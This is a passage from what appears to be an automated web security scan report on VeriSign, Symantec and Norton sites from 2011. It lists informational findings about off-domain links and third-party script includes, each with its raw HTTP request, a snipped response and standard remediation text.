The page was loaded from a URL containing a query string:http://www.verisign.com/code-signing/index.html?tid=a_box The response contains the following links to other domains:http://forums.sun.com/index.jspa http://msdn.microsoft.com/en-us/library/aa141471.aspx http://smallbusiness.norton.com/?inid=soho_verisign_footer http://us.norton.com/index.jsp http://www.addthis.com/bookmark.php?v=250 http://www.addthis.com/bookmark.php?v=250&username=verisign http://www.adobe.com/devnet/air/ http://www.adobe.com/support/director/downloads.html http://www.geotrust.com/geocenter/customer-login/ http://www.pctools.com/ http://www.symantec.com/ http://www.symantec.com/about/news/release/index.jsp?tid=footer http://www.symantec.com/business/theme.jsp?themeid=contact-verisign http://www.symantec.com/business/theme.jsp?themeid=verisign-authentication-products http://www.symantec.com/connect/blogs/symantec-wins-code-project-s-2011-members-choice-award-authentication-tools-verisign-code-sign http://www.verisign.be/ http://www.verisign.ch/ http://www.verisign.de/ http://www.verisign.dk/ http://www.verisign.es/ http://www.verisign.fr/ http://www.verisign.in/ http://www.verisign.it/ http://www.verisign.se/ http://www.verisignchina.com.cn/ https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab https://products.geotrust.com/signup/codesign.do?partner=geotrust.cs.geotrust https://s7.addthis.com/js/250/addthis_widget.js?username=verisign https://www.googleadservices.com/pagead/conversion.js https://www.googleadservices.com/pagead/conversion/1072569688/?label=TRqGCKHUsQIQ2Lq4_wM&guid=ON&script=0
Request
GET /code-signing/index.html?tid=a_box HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; mbox=session#1315621455064-973488#1315623513|PC#1315621455064-973488.19#1378693653|check#true#1315621713; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:08 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:27:08 GMT Content-Type: text/html Content-Length: 103179 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!--HEADER ASSETS...[SNIP]... <li><a href='//www.verisign.be/'> Belgium</a>...[SNIP]... <li><a href='//www.verisignchina.com.cn/'> China</a>...[SNIP]... <li><a href='//www.verisign.dk/'> Denmark</a>...[SNIP]... <li><a href='//www.verisign.fr/'> France</a>...[SNIP]... <li><a href='//www.verisign.de/'> Germany</a>...[SNIP]... <li><a href='//www.verisign.in/'> India</a>...[SNIP]... <li><a href='//www.verisign.it/'> Italy</a>...[SNIP]... <li><a href='//www.verisign.es/'> Spain</a>...[SNIP]... <li><a href='//www.verisign.se/'> Sweden</a>...[SNIP]... <li><a href='//www.verisign.ch/'> Switzerland</a>...[SNIP]... <li><a href="http://www.symantec.com/business/theme.jsp?themeid=contact-verisign"> Contact VeriSign</a>...[SNIP]... <noscript> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100"> <param name="movie" value="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.com&lang=en">...[SNIP]... <li><a href='https://cc-admin.geotrust.com/geocenter/reseller/logon.do'> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <div class="emailPrint" id="emailPrint"> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script> <a class="addthis_button_email" href="//www.addthis.com/bookmark.php?v=250"> <img alt="Email" title="Email" src="http://cdn.verisign.com/assets/shared/images/dev044079.gif"/>...[SNIP]... <img src="http://cdn.verisign.com/assets/shared/images/dev044080.gif"/><a href="//www.addthis.com/bookmark.php?v=250&username=verisign" class="addthis_button" addthis:ui_click="true"> <img alt="Share" title="Share" src="http://cdn.verisign.com/assets/shared/images/dev044077.gif"/>...[SNIP]... </a> or to <a href="http://forums.sun.com/index.jspa"> Sun Forums</a>...[SNIP]... </a> or to <a href="http://msdn.microsoft.com/en-us/library/aa141471.aspx"> msdn Office Developer Center</a>...[SNIP]... </a> Support or to <a href="http://www.adobe.com/devnet/air/"> Adobe AIR Developer Center</a>...[SNIP]... <p class="buy"> <a href="https://products.geotrust.com/signup/codesign.do?partner=geotrust.cs.geotrust"> BUY NOW</a>...[SNIP]... <p class="renew"> <a href="http://www.geotrust.com/geocenter/customer-login/"> SIGN IN</a>...[SNIP]... </a> or to <a href="http://www.adobe.com/support/director/downloads.html"> Director Support Center</a>...[SNIP]... </div> <a href="http://www.symantec.com/connect/blogs/symantec-wins-code-project-s-2011-members-choice-award-authentication-tools-verisign-code-sign "> <span id="awardBox" class="bottomBoxes">...[SNIP]... <li><a href='http://www.symantec.com/business/theme.jsp?themeid=contact-verisign'> Contact VeriSign</a>...[SNIP]... <li><a href='http://www.symantec.com/business/theme.jsp?themeid=verisign-authentication-products'> About VeriSign</a>...[SNIP]... <li><a href='http://www.symantec.com/about/news/release/index.jsp?tid=footer'> News</a>...[SNIP]... <p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'> Symantec Corp.</a>...[SNIP]... </a>). Symantec products include <a href='//us.norton.com/index.jsp'> Norton antivirus software</a>, <a href='http://smallbusiness.norton.com?inid=soho_verisign_footer'> Norton internet security solutions for small business</a>, and <a href='http://www.pctools.com'> PC Tools</a>...[SNIP]... </script> <script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]... <div style="display:inline;"> <img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1072569688/?label=TRqGCKHUsQIQ2Lq4_wM&guid=ON&script=0"/> </div>...[SNIP]...
14.69. http://www.verisign.com/trust-seal/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/trust-seal/index.html
Issue detail
The page was loaded from a URL containing a query string:http://www.verisign.com/trust-seal/index.html?tid=gnps The response contains the following links to other domains:http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab http://player.ooyala.com/player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent http://player.ooyala.com/player.swf?embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&version=2 http://smallbusiness.norton.com/?inid=soho_verisign_footer http://us.norton.com/index.jsp http://view.atdmt.com/iaction/slctsl_2010Q2TrustSeal_1 http://www.addthis.com/bookmark.php?v=250 http://www.addthis.com/bookmark.php?v=250&username=verisign http://www.facebook.com/VeriSignAuthentication http://www.pctools.com/ http://www.symantec.com/ http://www.symantec.com/about/news/release/index.jsp?tid=footer http://www.symantec.com/business/theme.jsp?themeid=contact-verisign http://www.symantec.com/business/theme.jsp?themeid=verisign-authentication-products http://www.twitter.com/TrustSeal http://www.verisign.be/ http://www.verisign.ch/ http://www.verisign.de/ http://www.verisign.dk/ http://www.verisign.es/ http://www.verisign.fr/ http://www.verisign.in/ http://www.verisign.it/ http://www.verisign.se/ http://www.verisignchina.com.cn/ http://www.youtube.com/user/VeriSignAuth https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
Request
GET /trust-seal/index.html?tid=gnps HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:13 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:26:13 GMT Content-Type: text/html Content-Length: 49851 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <META HTTP-EQUIV="X-UA-Comp...[SNIP]... <noscript> <iframe src="//view.atdmt.com/iaction/slctsl_2010Q2TrustSeal_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"> </iframe>...[SNIP]... <li><a href='//www.verisign.be/'> Belgium</a>...[SNIP]... <li><a href='//www.verisignchina.com.cn/'> China</a>...[SNIP]... <li><a href='//www.verisign.dk/'> Denmark</a>...[SNIP]... <li><a href='//www.verisign.fr/'> France</a>...[SNIP]... <li><a href='//www.verisign.de/'> Germany</a>...[SNIP]... <li><a href='//www.verisign.in/'> India</a>...[SNIP]... <li><a href='//www.verisign.it/'> Italy</a>...[SNIP]... <li><a href='//www.verisign.es/'> Spain</a>...[SNIP]... <li><a href='//www.verisign.se/'> Sweden</a>...[SNIP]... <li><a href='//www.verisign.ch/'> Switzerland</a>...[SNIP]... <li><a href="http://www.symantec.com/business/theme.jsp?themeid=contact-verisign"> Contact VeriSign</a>...[SNIP]... <noscript> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100"> <param name="movie" value="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.com&lang=en">...[SNIP]... <li><a href='https://cc-admin.geotrust.com/geocenter/reseller/logon.do'> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <div class="emailPrint" id="emailPrint"> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script> <a class="addthis_button_email" href="//www.addthis.com/bookmark.php?v=250"> <img alt="Email" title="Email" src="http://cdn.verisign.com/assets/shared/images/dev044079.gif"/>...[SNIP]... <img src="http://cdn.verisign.com/assets/shared/images/dev044080.gif"/><a href="//www.addthis.com/bookmark.php?v=250&username=verisign" class="addthis_button" addthis:ui_click="true"> <img alt="Share" title="Share" src="http://cdn.verisign.com/assets/shared/images/dev044077.gif"/>...[SNIP]... <div id="vid_container"> <script src="http://player.ooyala.com/player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent"> </script> <noscript> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="ooyalaPlayer_nezp_gh3eobtg" width="356" height="224" codebase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab"> <param name="movie" value="http://player.ooyala.com/player.swf?embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&version=2" />...[SNIP]... <param name="wmode" value="transparent" /> <embed src="http://player.ooyala.com/player.swf?embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&version=2" bgcolor="#000000" width="356" height="224" name="ooyalaPlayer_nezp_gh3eobtg" align="middle" play="true" loop="false" allowscriptaccess="always" allowfullscreen="true" type="application/x-shockwave-flash" flashvars="&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG" pluginspage="http://www.adobe.com/go/getflashplayer"> </embed>...[SNIP]... <div id="logos" class="floatl"> <a href="http://www.facebook.com/VeriSignAuthentication"> <img src="/assets/trust-seal/images/Facebook.png" alt="Facebook" style="margin-left:34px; margin-right:37px;"/></a><a href="http://www.twitter.com/TrustSeal"> <img src="/assets/trust-seal/images/Twitter.png" alt="Twitter" style="margin-right:37px;"/></a><a href="http://www.youtube.com/user/VeriSignAuth"> <img src="/assets/trust-seal/images/YouTube.png" alt="YouTube" />...[SNIP]... <li><a href='http://www.symantec.com/business/theme.jsp?themeid=contact-verisign'> Contact VeriSign</a>...[SNIP]... <li><a href='http://www.symantec.com/business/theme.jsp?themeid=verisign-authentication-products'> About VeriSign</a>...[SNIP]... <li><a href='http://www.symantec.com/about/news/release/index.jsp?tid=footer'> News</a>...[SNIP]... <p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'> Symantec Corp.</a>...[SNIP]... </a>). Symantec products include <a href='//us.norton.com/index.jsp'> Norton antivirus software</a>, <a href='http://smallbusiness.norton.com?inid=soho_verisign_footer'> Norton internet security solutions for small business</a>, and <a href='http://www.pctools.com'> PC Tools</a>...[SNIP]...
14.70. http://www.verisign.com/verisign-worldwide/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/verisign-worldwide/index.html
Issue detail
The page was loaded from a URL containing a query string:http://www.verisign.com/verisign-worldwide/index.html?tid=footer The response contains the following links to other domains:http://smallbusiness.norton.com/?inid=soho_verisign_footer http://us.norton.com/index.jsp http://www.addthis.com/bookmark.php?v=250 http://www.addthis.com/bookmark.php?v=250&username=verisign http://www.pctools.com/ http://www.symantec.com/ http://www.symantec.com/about/news/release/index.jsp?tid=footer http://www.symantec.com/business/theme.jsp?themeid=contact-verisign http://www.symantec.com/business/theme.jsp?themeid=verisign-authentication-products http://www.verisign.be/ http://www.verisign.ch/ http://www.verisign.de/ http://www.verisign.dk/ http://www.verisign.es/ http://www.verisign.fr/ http://www.verisign.in/ http://www.verisign.it/ http://www.verisign.se/ http://www.verisignchina.com.cn/ https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
Request
GET /verisign-worldwide/index.html?tid=footer HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:26:10 GMT Content-Type: text/html Content-Length: 42646 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte...[SNIP]... <li><a href='//www.verisign.be/'> Belgium</a>...[SNIP]... <li><a href='//www.verisignchina.com.cn/'> China</a>...[SNIP]... <li><a href='//www.verisign.dk/'> Denmark</a>...[SNIP]... <li><a href='//www.verisign.fr/'> France</a>...[SNIP]... <li><a href='//www.verisign.de/'> Germany</a>...[SNIP]... <li><a href='//www.verisign.in/'> India</a>...[SNIP]... <li><a href='//www.verisign.it/'> Italy</a>...[SNIP]... <li><a href='//www.verisign.es/'> Spain</a>...[SNIP]... <li><a href='//www.verisign.se/'> Sweden</a>...[SNIP]... <li><a href='//www.verisign.ch/'> Switzerland</a>...[SNIP]... <li><a href="http://www.symantec.com/business/theme.jsp?themeid=contact-verisign"> Contact VeriSign</a>...[SNIP]... <noscript> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100"> <param name="movie" value="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.com&lang=en">...[SNIP]... <li><a href='https://cc-admin.geotrust.com/geocenter/reseller/logon.do'> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <div class="emailPrint" id="emailPrint"> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script> <a class="addthis_button_email" href="//www.addthis.com/bookmark.php?v=250"> <img alt="Email" title="Email" src="http://cdn.verisign.com/assets/shared/images/dev044079.gif"/>...[SNIP]... <img src="http://cdn.verisign.com/assets/shared/images/dev044080.gif"/><a href="//www.addthis.com/bookmark.php?v=250&username=verisign" class="addthis_button" addthis:ui_click="true"> <img alt="Share" title="Share" src="http://cdn.verisign.com/assets/shared/images/dev044077.gif"/>...[SNIP]... <p name="p1" id="p1"> VeriSign Authentication Services, now part of <a href="//www.symantec.com"> Symantec Corp.</a>...[SNIP]... <li> <a target="_top" href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li> <a target="_top" href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li> <a target="_top" href="//www.verisign.fr/"> France</a>...[SNIP]... <li> <a target="_top" href="//www.verisign.de/"> Germany</a>...[SNIP]... <li> <a target="_top" href="//www.verisign.it/"> Italy</a>...[SNIP]... <li> <a target="_top" href="//www.verisign.es/"> Spain</a>...[SNIP]... <li> <a target="_top" href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li> <a target="_top" href="//www.verisign.ch/"> Switzerland</a>...[SNIP]... <p class="greytext"> If your country is not listed above please visit our English language site <a id="qlinks" class="qlink greytext" target="_top" href="//www.verisign.ch/"> VeriSign Switzerland</a>...[SNIP]... <li> <a href='//www.verisign.be/'> VeriSign Belgium</a>...[SNIP]... <li> <a href='//www.verisign.dk/'> VeriSign Denmark</a>...[SNIP]... <li> <a href='//www.verisign.fr/'> VeriSign France</a>...[SNIP]... <li> <a href='//www.verisign.de/'> VeriSign Germany</a>...[SNIP]... <li> <a href='//www.verisign.it/'> VeriSign Italy</a>...[SNIP]... <li> <a href='//www.verisign.es/'> VeriSign Spain</a>...[SNIP]... <li> <a href='//www.verisign.se/'> VeriSign Sweden</a>...[SNIP]... <li> <a href='//www.verisign.ch/'> VeriSign Switzerland</a>...[SNIP]... <li> <a href='//www.verisignchina.com.cn/'> VeriSign China</a>...[SNIP]... <li> <a href='//www.verisign.in/'> VeriSign India</a>...[SNIP]... <li><a href='http://www.symantec.com/business/theme.jsp?themeid=contact-verisign'> Contact VeriSign</a>...[SNIP]... <li><a href='http://www.symantec.com/business/theme.jsp?themeid=verisign-authentication-products'> About VeriSign</a>...[SNIP]... <li><a href='http://www.symantec.com/about/news/release/index.jsp?tid=footer'> News</a>...[SNIP]... <p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'> Symantec Corp.</a>...[SNIP]... </a>). Symantec products include <a href='//us.norton.com/index.jsp'> Norton antivirus software</a>, <a href='http://smallbusiness.norton.com?inid=soho_verisign_footer'> Norton internet security solutions for small business</a>, and <a href='http://www.pctools.com'> PC Tools</a>...[SNIP]...
15. Cross-domain script include
previous
next
There are 45 instances of this issue:
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user. If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
15.1. http://blogs.verisign.com/web-user-experience/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blogs.verisign.com
Path:
/web-user-experience/
Issue detail
The response dynamically includes the following scripts from other domains:http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/05/new-rapidssl-seal-design-avail.php http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/05/new-video-banner-interactivity-debuts-on-geotrust-website.php http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/05/study-users-choose-convenience-over-clicks.php http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/firefox-5-offers-improved-text-and-multimedia-capabilities.php http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/launch-of-always-on-ssl-and-firesheep-attacks-page.php http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/launch-of-code-signing-redesign.php http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/redesign-simplifies-options-for-getting-trust-seal.php http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/what-the-first-ever-website-teaches-us-about-usability.php http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/07/introducing-trust-seal-monthly-service.php http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/08/geotrust-homepage-facelift.php http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/08/geotrust-logo-gets-a-sharper-profile.php http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/08/launch-of-eperspectives-executive-blog.php http://s7.addthis.com/js/200/addthis_widget.js http://twitter.com/javascripts/typepad.js http://twitter.com/statuses/user_timeline/ReshmaKumar.json?callback=twitterCallback2&count=5 https://ssl.google-analytics.com/urchin.js
Request
GET /web-user-experience/ HTTP/1.1 Host: blogs.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:59 GMT Server: Apache Accept-Ranges: bytes X-Powered-By: PHP/5.0.4 Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 70620 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard"> <head> <tit...[SNIP]... <span style="font-size:11px;"> <script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/08/launch-of-eperspectives-executive-blog.php" type="text/javascript" charset="utf-8"> </script>...[SNIP]... </a> <script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"> </script>...[SNIP]... <span style="font-size:11px;"> <script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/08/geotrust-logo-gets-a-sharper-profile.php" type="text/javascript" charset="utf-8"> </script>...[SNIP]... </a> <script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"> </script>...[SNIP]... <span style="font-size:11px;"> <script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/08/geotrust-homepage-facelift.php" type="text/javascript" charset="utf-8"> </script>...[SNIP]... </a> <script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"> </script>...[SNIP]... <span style="font-size:11px;"> <script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/07/introducing-trust-seal-monthly-service.php" type="text/javascript" charset="utf-8"> </script>...[SNIP]... </a> <script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"> </script>...[SNIP]... <span style="font-size:11px;"> <script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/what-the-first-ever-website-teaches-us-about-usability.php" type="text/javascript" charset="utf-8"> </script>...[SNIP]... </a> <script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"> </script>...[SNIP]... <span style="font-size:11px;"> <script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/firefox-5-offers-improved-text-and-multimedia-capabilities.php" type="text/javascript" charset="utf-8"> </script>...[SNIP]... </a> <script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"> </script>...[SNIP]... <span style="font-size:11px;"> <script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/launch-of-code-signing-redesign.php" type="text/javascript" charset="utf-8"> </script>...[SNIP]... </a> <script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"> </script>...[SNIP]... <span style="font-size:11px;"> <script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/launch-of-always-on-ssl-and-firesheep-attacks-page.php" type="text/javascript" charset="utf-8"> </script>...[SNIP]... </a> <script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"> </script>...[SNIP]... <span style="font-size:11px;"> <script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/redesign-simplifies-options-for-getting-trust-seal.php" type="text/javascript" charset="utf-8"> </script>...[SNIP]... </a> <script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"> </script>...[SNIP]... <span style="font-size:11px;"> <script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/05/new-video-banner-interactivity-debuts-on-geotrust-website.php" type="text/javascript" charset="utf-8"> </script>...[SNIP]... </a> <script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"> </script>...[SNIP]... <span style="font-size:11px;"> <script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/05/study-users-choose-convenience-over-clicks.php" type="text/javascript" charset="utf-8"> </script>...[SNIP]... </a> <script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"> </script>...[SNIP]... <span style="font-size:11px;"> <script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/05/new-rapidssl-seal-design-avail.php" type="text/javascript" charset="utf-8"> </script>...[SNIP]... </a> <script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"> </script>...[SNIP]... </div><script type="text/javascript" src="http://twitter.com/javascripts/typepad.js"> </script><script type="text/javascript" src="http://twitter.com/statuses/user_timeline/ReshmaKumar.json?callback=twitterCallback2&count=5"> </script>...[SNIP]... </div><script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"> </script>...[SNIP]...
15.2. http://community.norton.com/norton/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://community.norton.com
Path:
/norton/
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js http://norton.i.lithium.com/t5/scripts/77C9F3D724AC1AE6812CFEF77A811FB9/lia-scripts-body-min.js http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n http://www.symantec.com/script/omniture/om_code.js http://www.symantec.com/script/omniture/s_code.js
Request
GET /norton/ HTTP/1.1 Host: community.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
